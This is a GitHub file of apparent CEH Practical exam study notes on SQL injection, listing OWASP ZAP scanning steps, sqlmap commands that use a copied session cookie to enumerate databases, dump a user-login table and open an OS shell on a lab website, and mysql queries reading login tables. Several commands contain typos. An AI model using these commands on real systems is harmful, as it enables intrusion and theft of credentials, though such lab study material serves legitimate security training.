forked from infovault-Ytube/CEH-Practical-Notes
-
Notifications
You must be signed in to change notification settings - Fork 3
Expand file tree
/
Copy pathSQL Injection
More file actions
54 lines (29 loc) · 1.62 KB
/
SQL Injection
File metadata and controls
54 lines (29 loc) · 1.62 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
OWASP ZAP
Open the ZAP
Add the webiste name to Autoscan
Click on the Alert tab to know about Vulnerabilities
---------------------------------------------------------------------------------------------------------------------------------------------------------
SQL MAP
Open the vulnerable website
Copy the cookie from the inspect element
Open the terminal to use sqlmap
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl="; --dbs
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moveiscope --tables
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" -D moviescope -T user-Login --dump
You will get all the Useraname and Passwords of the website.
------------------------------------------------------------------------------------------------------------------------------------------------------
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="mscope=1jwuydl=; ui-tabs-1=0" --os-shell
It opens up the Interactive OS shell.
-------------------------------------------------------------------------------------------------------------------------------------------------------
mysql -U qdpmadmin -h 192.168.1.8 -P passwod
show databases;
use qdpm;
show tables'
select * from users;
show dtabases;
use staff;
show tables;
select * from login;
select * from user;
When you have username and Password for the database.
-------------------------------------------------------------------------------------------------------------------------------------------------------